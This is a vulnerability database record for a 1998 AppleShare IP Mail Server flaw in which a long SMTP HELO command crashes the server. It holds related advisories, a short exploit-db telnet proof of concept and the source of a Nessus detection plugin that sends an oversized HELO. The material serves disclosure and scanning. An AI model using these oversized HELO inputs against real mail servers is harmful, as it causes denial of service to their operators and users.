ID OSVDB:5970 Type osvdb Reporter Chris Wedgwood(chris@cybernet.co.nz) Modified 1998-04-08T13:11:17
Description
Vulnerability Description
AppleShare IP Mail Server contains a flaw that allows a remote attacker to crash the server. The issue is due to a buffer overflow condition in the SMTP service. By sending a HELO command containing 1024 or more characters to port 25, an attacker will crash the server.
Solution Description
Upgrade to version 5.0.4, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
AppleShare IP Mail Server contains a flaw that allows a remote attacker to crash the server. The issue is due to a buffer overflow condition in the SMTP service. By sending a HELO command containing 1024 or more characters to port 25, an attacker will crash the server.
{"type": "osvdb", "published": "1998-04-08T13:11:17", "href": "https://vulners.com/osvdb/OSVDB:5970", "hashmap": [{"key": "affectedSoftware", "hash": "8ca19e91a8b629e4354513445596b8ed"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "759d77d2cd477203cd943a02405a7cf2"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "24d0d8521686de45d97b3bf5bc99f23d"}, {"key": "href", "hash": "df796250c6e6bda374f8df5dbeb13e7d"}, {"key": "modified", "hash": "2988c0b4f32a9298fb56f87e9142e8f3"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "2988c0b4f32a9298fb56f87e9142e8f3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ed380dbcd5bd646c4eb656c8f9dc874e"}, {"key": "title", "hash": "b8ac8d95c95f81934386006619e9cd05"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "viewCount": 1, "history": [], "edition": 1, "objectVersion": "1.2", "reporter": "Chris Wedgwood(chris@cybernet.co.nz)", "title": "AppleShare IP Mail Server Long HELO Overflow", "affectedSoftware": [{"operator": "eq", "version": "5.0.3", "name": "AppleShare IP Mail Server"}], "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:00"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-1015"]}, {"type": "osvdb", "idList": ["OSVDB:7032", "OSVDB:5855"]}, {"type": "exploitdb", "idList": ["EDB-ID:19046"]}, {"type": "nessus", "idList": ["SMTP_HELO.NASL"]}], "modified": "2017-04-28T13:20:00"}, "vulnersScore": 6.9}, "references": [], "id": "OSVDB:5970", "hash": "13266377f995e3e4cdb973d5a3dea2584dae259267ae6521d3a391a5dd41347b", "lastseen": "2017-04-28T13:20:00", "cvelist": ["CVE-1999-1015"], "modified": "1998-04-08T13:11:17", "description": "## Vulnerability Description\nAppleShare IP Mail Server contains a flaw that allows a remote attacker to crash the server. The issue is due to a buffer overflow condition in the SMTP service. By sending a HELO command containing 1024 or more characters to port 25, an attacker will crash the server.\n## Solution Description\nUpgrade to version 5.0.4, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nAppleShare IP Mail Server contains a flaw that allows a remote attacker to crash the server. The issue is due to a buffer overflow condition in the SMTP service. By sending a HELO command containing 1024 or more characters to port 25, an attacker will crash the server.\n## References:\n[Vendor Specific Advisory URL](http://developer.apple.com/devnews/devnews050898.html)\n[Related OSVDB ID: 5969](https://vulners.com/osvdb/OSVDB:5969)\n[Related OSVDB ID: 6023](https://vulners.com/osvdb/OSVDB:6023)\n[Related OSVDB ID: 6031](https://vulners.com/osvdb/OSVDB:6031)\n[Related OSVDB ID: 6034](https://vulners.com/osvdb/OSVDB:6034)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1998_2/0039.html\nISS X-Force ID: 886\n[CVE-1999-1015](https://vulners.com/cve/CVE-1999-1015)\nBugtraq ID: 0061\n"}
{"cve": [{"lastseen": "2019-05-29T18:07:36", "bulletinFamily": "NVD", "description": "Buffer overflow in Apple AppleShare Mail Server 5.0.3 on MacOS 8.1 and earlier allows a remote attacker to cause a denial of service (crash) via a long HELO command.", "modified": "2017-11-21T19:16:00", "id": "CVE-1999-1015", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1015", "published": "1998-04-08T04:00:00", "title": "CVE-1999-1015", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-02-02T10:57:47", "bulletinFamily": "exploit", "description": "AppleShare IP Mail Server 5.0.3 Buffer Overflow Vulnerability. CVE-1999-1015. Dos exploit for aix platform", "modified": "1999-10-15T00:00:00", "published": "1999-10-15T00:00:00", "id": "EDB-ID:19046", "href": "https://www.exploit-db.com/exploits/19046/", "type": "exploitdb", "title": "AppleShare IP Mail Server 5.0.3 - Buffer Overflow Vulnerability", "sourceData": "source: http://www.securityfocus.com/bid/61/info\r\n\r\nThere exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port \r\nand issue a HELO command with a large string (500 bytes or more) for a hostname the server, and possibly the whole machine, will crash.\r\n\r\n$ telnet some.where\r\nTrying 1.2.3.4...\r\nConnected to some.where.\r\nEscape character is '^]'.\r\n220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready\r\nHELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX\r\n[ and it just hangs ]\r\n\r\n$ ping some.where\r\n[ ...nothing... ] ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/19046/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:02", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in AppleShare IP Mail Server. The HELO command fails to validate input resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service resulting in a loss of availability.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nA remote overflow exists in AppleShare IP Mail Server. The HELO command fails to validate input resulting in a buffer overflow. With a specially crafted request, an attacker can cause a denial of service resulting in a loss of availability.\n## Manual Testing Notes\n$ telnet [victim] 25\nTrying 1.2.3.4...\nConnected to some.where.\nEscape character is '^]'.\n220 some.where AppleShare IP Mail Server 5.0.3 SMTP Server Ready\nHELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX\n[ and it just hangs ]\n## References:\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=89200657216213&w=2\n[CVE-1999-1015](https://vulners.com/cve/CVE-1999-1015)\nBugtraq ID: 61\n", "modified": "1998-04-08T00:00:00", "published": "1998-04-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:7032", "id": "OSVDB:7032", "title": "AppleShare IP Mail Server HELO Overflow DoS", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:00", "bulletinFamily": "software", "description": "## Vulnerability Description\nA remote overflow exists in multiple Mail Transfer Agents (MTA). The 'HELO' command fails to perform proper bounds checking resulting in a buffer overflow. With an overly long request to the command, a remote attacker can cause the SMTP service to crash resulting in a loss of availability.\n## Solution Description\nContact your vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in multiple Mail Transfer Agents (MTA). The 'HELO' command fails to perform proper bounds checking resulting in a buffer overflow. With an overly long request to the command, a remote attacker can cause the SMTP service to crash resulting in a loss of availability.\n## References:\nVendor URL: http://www.microsoft.com/\nVendor URL: http://www.seattlelab.com/\nVendor URL: http://www.stalker.com/content/default.html\nVendor URL: http://www.ipswitch.com/\nVendor URL: http://www.apple.com/\nOther Advisory URL: http://www.eeye.com/html/Research/Advisories/AD19990204.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1998_2/0039.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1998_2/0046.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/1998_2/0040.html\nISS X-Force ID: 886\n[CVE-1999-1015](https://vulners.com/cve/CVE-1999-1015)\n[CVE-1999-0284](https://vulners.com/cve/CVE-1999-0284)\n[CVE-1999-1504](https://vulners.com/cve/CVE-1999-1504)\nBugtraq ID: 8555\nBugtraq ID: 62\nBugtraq ID: 8621\nBugtraq ID: 61\n", "modified": "1998-04-08T00:00:00", "published": "1998-04-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:5855", "id": "OSVDB:5855", "type": "osvdb", "title": "Multiple MTA Long HELO Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:07:39", "bulletinFamily": "scanner", "description": "The remote SMTP server seems to allow remote users to send mail anonymously by providing arguments that are too long to the HELO command (more than 1024 chars).\n\nThis problem may allow malicious users to send unsolicited mail (i.e., SPAM) or threatening mail using the server, and keep their anonymity.", "modified": "2018-11-15T00:00:00", "id": "SMTP_HELO.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=10260", "published": "1999-08-18T00:00:00", "title": "Multiple MTA HELO Command Remote Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude( 'compat.inc' );\n\nif(description)\n{\n script_id(10260);\n script_version (\"1.49\");\n\n script_cve_id(\"CVE-1999-0098\", \"CVE-1999-1015\", \"CVE-1999-1504\");\n script_bugtraq_id(49431, 61, 62);\n\n script_name(english:\"Multiple MTA HELO Command Remote Overflow\");\n script_summary(english:\"Checks if the remote mail server can be used to send anonymous mail\");\n\n script_set_attribute(attribute:'synopsis',\n value:'The remote SMTP server is vulnerable to an access control breach.');\n\n script_set_attribute(\n attribute:'description',\n value:'The remote SMTP server seems to allow remote users to\nsend mail anonymously by providing arguments that are\ntoo long to the HELO command (more than 1024 chars).\n\nThis problem may allow malicious users to send unsolicited\nmail (i.e., SPAM) or threatening mail using the server,\nand keep their anonymity.');\n\n script_set_attribute(\n attribute:'solution',\n value:'If sendmail is being used, upgrade to version 8.9.x or newer.\nIf you do not run sendmail, contact your vendor.');\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:'see_also', value:'https://marc.info/?l=bugtraq&m=90221101925991&w=2');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"1999/08/18\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"1998/01/10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_MIXED_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SMTP problems\");\n script_dependencie(\"find_service1.nasl\", \"sendmail_expn.nasl\", \"smtpserver_detect.nasl\", \"smtpscan.nasl\");\n script_exclude_keys(\"SMTP/wrapped\", \"SMTP/qmail\", \"SMTP/microsoft_esmtp_5\", \"SMTP/postfix\", \"SMTP/domino\");\n script_require_keys(\"SMTP/sendmail\");\n script_require_ports(\"Services/smtp\", 25);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"smtp_func.inc\");\n\nport = get_kb_item(\"Services/smtp\");\nif(!port)port = 25;\n\nif (get_kb_item('SMTP/'+port+'/broken')) exit(0);\n\nsig = get_kb_item(string(\"smtp/\", port, \"/real_banner\"));\nif ( sig && \"Sendmail\" >!< sig ) exit(0);\nbanner = get_smtp_banner(port:port);\nif(\"Sendmail\" >!< banner) exit(0);\n\n\nif(safe_checks())\n{\n if(\"Sendmail\" >< banner)\n {\n version = ereg_replace(string:banner,\n pattern:\".* Sendmail (.*)/.*\",\n replace:\"\\1\");\n\n if(ereg(string:version, pattern:\"((^[0-7]\\..*)|(^8\\.[0-8]\\..*))\"))\n {\n alrt =\n\"You are running a version of Sendmail which is older\nthan version 8.9.0.\n\nThere is a flaw in this version that allows people to send\nmail anonymously through this server (their IP won't be shown\nto the recipient), through a buffer overflow in the HELO\ncommand.\n\n*** Nessus reports this vulnerability using only\n*** information that was gathered. Use caution\n*** when testing without safe checks enabled.\n\nSolution : Upgrade to Sendmail 8.9.0 or newer\nRisk factor : Low\";\n\n security_hole(port:port, extra:alrt);\n }\n }\n exit(0);\n}\n\n\nif(get_port_state(port))\n{\n soc = open_sock_tcp(port);\n if(soc)\n {\n data = smtp_recv_banner(socket:soc);\n if (!data)\n {\n close(soc);\n exit(0);\n }\n crp = string(\"HELO \", crap(1030), \"\\r\\n\");\n send(socket:soc, data:crp);\n data = recv_line(socket:soc, length:4);\n if(data == \"250 \") security_hole(port);\n close(soc);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
